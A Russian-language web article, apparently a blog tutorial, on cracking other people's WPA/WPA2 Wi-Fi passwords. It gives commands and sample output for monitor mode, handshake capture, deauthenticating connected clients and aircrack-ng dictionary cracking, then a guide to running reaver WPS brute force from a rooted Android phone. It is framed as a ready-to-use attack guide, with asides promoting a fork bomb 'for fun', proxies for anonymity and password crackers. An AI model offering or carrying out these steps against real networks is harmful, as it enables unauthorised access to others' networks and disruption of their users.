Подбор пароля Wi-Fi утилитой aircrack-ng

19.11.2020 0

Если вы хотите узнать, как взломать WiFi роутер — просто прочтите эту пошаговую инструкцию по использованию aircrack-ng, выполните ряд проверенных команд и с легкостью взломайте пароль от WiFi.

С помощью этих команд вы сможете взломать WiFi роутер с WPA/WPA2-PSK (pre-shared key) шифрованием.

Основа этого способа взлома WiFi заключается в перехвате WPA/WPA2 рукопожатия во время аутентификации и взломе PSK с помощью aircrack-ng.

Как взломать WiFi — основные шаги:

  • Установите последнюю версии aircrack-ng
  • Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью airmon-ng
  • Запустите airodump-ng для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID
  • [Опционально] Используйте aireplay-ng для де-аутентификации клиента
  • Запустите aircrack-ng для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия
  • Aircrack-ng: Скачать и Установить

    Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший aircrack-ng из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.

    Установите необходимы зависимости:

    $ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

    Скачайте и установите последнюю версию aircrack-ng (текущая версия):

    $ wget https://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O — | tar -xz $ cd aircrack-ng-1.2-rc4 $ sudo make $ sudo make install

    Убедитесь что установлена именно последняя версия aircrack-ng:

    $ aircrack-ng —help Aircrack-ng 1.2 rc4 — (C) 2006-2015 Thomas d’Otreppe https://www.aircrack-ng.org

    Как пользоваться Aircrack-ng

    В глобальной сети Интернет можно найти множество инструкций, которые или помогут вам освоить этот инструмент, либо насовсем отобьют «охоту». Мы решили не запутывать вас длинными пространными речами, а собрали небольшое универсальное руководство. Надеемся, оно вам поможет.
    В десктопной версии для Виндоус отсутствует мастер автоматической загрузки, поэтому проделываем следующие манипуляции вручную:

  • Для начала отключитесь от вай-фай сети.
  • Скачайте Aircrack-ng (по ссылке под статьей), а затем распакуйте установочный файл.
  • Перейдите в папку “Bin” и запустите интерфейс программы.
  • Перед нами 5 основных вкладок. Ищем «Filenames» и выбираем дамп (по окончании захвата данных).
  • Определяемся с типом шифрования (“Encryption”).
  • Ставим галочки в пунктах «Advanced option» и «Specify ESSID» (в последнем прописываем имя взламываемой сети)
  • Кликаем на «Launch» и запускаем процесс анализа. Перебор начнется автоматически и может длиться от 2-5 минут до 10 часов (в зависимости от сложности ключей).
  • Что можно сделать далее? – По сути многое — можете поработать с WEP ⁄ WPA ключами и ESSID списками, настроить консоли, исправить ошибки, заменить свои пароли, снять WEP-маскировки и т.д. Можно, конечно, начать перебор ключей по словарю.
    Для наглядности и глубокого понимания того, как пользоваться утилитой, мы добавили ссылку на неплохую пользовательскую видео-инструкцию:

    Airmon-ng: Режим Мониторинга

    Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.
    Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.

    Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

    Найдите и остановите все процессы, которые могут помешать:

    $ sudo airmon-ng check kill

    Запустите беспроводной интерфейс в режиме мониторинга:

    $ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 6235 iwlwifi — [phy0] (monitor mode enabled on mon0)

    В приведенном выше примере, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга.

    Таким образом, mon0 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

    Airodump-ng: Перехват Рукопожатия

    Дельный Совет: Хотите немного «развлечься»? Создайте форк-бомбу в Linux! Одна маленькая строчка, способная повесить всю систему! Читать далее →

    Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

    Это можно сделать с помощью команды airodump-ng:

    $ sudo airodump-ng mon0

    Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

    CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe 66:77:88:99:00:11 -64 134 345 34 1 54e WPA2 CCMP PSK SomeAP BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 — 1 114 56 00:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 — 1 0 1 66:77:88:99:00:11 MM:NN:OO:PP:QQ:RR -78 2 — 32 0 1

    Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите airodump-ng на том же канале с фильтром по BSSID:

    $ sudo airodump-ng -c 1 —bssid 00:11:22:33:44:55 -w WPAcrack mon0 —ignore-negative-one

    ОпцияОписание -cКанал беспроводной сети —bssidMAC адрес точки доступа -wПрефикс файла в который будет записано рукопожатие mon0Сетевой интерфейс —ignore-negative-oneУбирает сообщение ‘fixed channel : -1’

    Теперь нам остается только ждать когда airodump-ng словит рукопожатие.
    Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.

    По прошествию некоторого времени вы должны увидеть сообщение WPA handshake: 00:11:22:33:44:55 в правом верхнем углу экрана.

    Это сообщение означает, что airodump-ng успешно перехватил рукопожатие:

    CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15 WPA handshake: 00:11:22:33:44:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 — 1 114 56

    Aireplay-ng: Деаутентификации Клиента

    Дельный Совет: Хотите сохранить анонимность? Узнайте как использовать ПРОКСИ из командной строки в Linux. Читать далее →

    Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа.

    После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

    Отправить широковещательное deauth сообщение:

    $ sudo aireplay-ng —deauth 100 -a 00:11:22:33:44:55 mon0 —ignore-negative-one

    Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):

    $ sudo aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 —ignore-negative-one

    ОпцияОписание —deauth 100Сколько deauth сообщений отправить (0 — без ограничений) -aMAC адрес точки доступа -cMAC адрес клиента mon0Сетевой интерфейс —ignore-negative-oneУбирает сообщение ‘fixed channel : -1’

    Дельный Совет: Нужно взломать пароль от WiFi? Не тратьте свое время попусту! Используйте «John the Ripper» — самый быстрый взломщик паролей! Читать далее →

    Взлом WiFi WPS протокола на андроид.

    Когда нечего делать или как я устанавливал aircrack и reaver на android. Я подумал а не попробовать ли мне установить kali-linux на android через linux installer, но затем передумал и решил просто установить reaver и aircrack на телефон. Но тут возник вопрос как перевести WiFi в режим монитора.

    В интернете про запуск reaver’a и aircrack’a под android’om информации мало, в основном на XDA-Developers. Исходя из того что я вычитал из XDA для того чтобы как перевести WiFi в режим монитора нужно компилировать/ставить на телефон кастомные драйвера для WiFi, которые, к тому же, не факт что будут работать… Ну в общем ничего хорошего я там не вычитал, разве что нашел reaver скомпилированный под android. А вот с aircrack’om вышла проблема, его я искал долго и нудно, но нашел статическую версию для armel.

    Итак пол дела сделано, осталось разобраться с режимом монитора. Опять же на XDA была статья про это, но там требовалось ставить кастомные драйвера и по моему ядро. Я подумал что это слишком, подумал может как нибудь получится без этого. Запустил на телефоне эмулятор терминала и начал колупать. В итоге выяснил что и драйвера и адаптер режим монитора поддерживают, но перевести адаптер в этот самый режим оказалось не так просто. Но добрый гугл мне помог разобратсья с этой проблемой. Итак уже почти все готово. Запускаем airodump-ng

    :

    О чудо он работает. Ну впрочем теперь можно и reaver

    попробовать запустить:

    Неужели и он работает? Но в каждой бочке мёда есть своя ложка дегтя:

    Из выше расположенного скриншота видно что скорость перебора ключей reaver’om 7 секунд на ключ, это конечно прискорбно. Ждать пока он подберет пароль к роутеру было бы неразумно, поэтому я и не стал. Испытуемым был SE Xperia Mini, но на более новых более мощных телефонах, думаю, процесс пойдет быстрее.

    Инструкция:

    Вдруг кому то пригодится.

    Предупреждение! Автор за последствия ответственность не несет, все что вы делаете вы делаете на свой страх и риск.

    Все что я делал, я делал на Android ICS 4.0.4 (будет ли это работать на других — не знаю, но думаю на 4.x.x должно).

    Нам понадобится:

  • Телефон с Android’om на борту (В данном случае SE Xperia Mini, 512 RAM, 1 GHz, Android ICS 4.0.4
    );
  • Рут права;
  • Эмулятор терминала или аналог;
  • Reaver и aircrack скомпилированные под android (можно скачать тут или собрать свои);
  • Роутер (В данном случае TP-Link на счет модели — не знаю);
  • Компьютер с установленным ADB — не обязательно, но удобно;
  • И самое главное — прямые руки, без них — никак.
  • Итак приступим

    Тут есть два варианта:

  • Скопировать утилиты на SD карту и перемонтировать ее для выполнения;
  • Перемонтировать /system для записи и скинуть туда.
  • Я выбрал второй способ. Далее нам надо запустить WiFi в режиме монитора (пока будет запущен монитор WiFi будет немного нестабилен). Для начала нужно создать экземпляр монитора, для этого заходим в терминал и пишем:

    su iw phy0 interface add mon0 type monitor

    mon0 можно заменить на любое другое имя

    В результате получим что-то вроде этого:

    Если набрать netcfg

    увидим следующее:

    Где wlan0 и mon0 это именно то что нам нужно.

    Для работы монитора WiFi должен быть включен в настройках телефона

    Осталась самая малость. Запускаем airodump

    netcfg mon0 up cd /путь/к/бинарникам/airodump ./airodump -i mon0 Для остановки необходимо нажать Ctrl+C (Уменьшить громкость, затем C на англ. раскладке — справедливо для Android Terminal Emulator).

    Запускаем reaver

    cd /путь/к/бинарникам/reaver ./reaver -i mon0 -b 11:22:33:44:55:66 -vv

    11:22:33:44:55:66 как вы поняли нужно заменить на BSSID необходимой сети

    Для остановки необходимо нажать Ctrl+C (Уменьшить громкость, затем C на англ. раскладке — справедливо для Android Terminal Emulator).

    Послесловие

    Перебирает reaver конечно медленно, но возможно на более новых мощных телефонах процесс пойдет быстрее. А также кроме reaver’a имеются airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, aireplay-ng, airodump-ng, airserv-ng, airtun-ng, besside-ng, besside-ng-crawler, packetforge-ng, wash может кому пригодятся.

    А также хочу предупредить что…

    • … reaver работает немного нестабильно, порой не хочет подключатся к сети.
    • … монитор нужно выключать иначе будут проблемы с подключением к сетям. su netcfg mon0 down
    • … после перезапуска телефона монитор mon0 будет удален и его придется создавать заново.

    Для тех у кого нет iw, его можно взять тут Для тех у кого нет ifconfig нужно установить busybox Для тех, у кого нет iwconfig, его можно найти тут

    Click to rate this post!

    [Total: 14 Average: 3.2]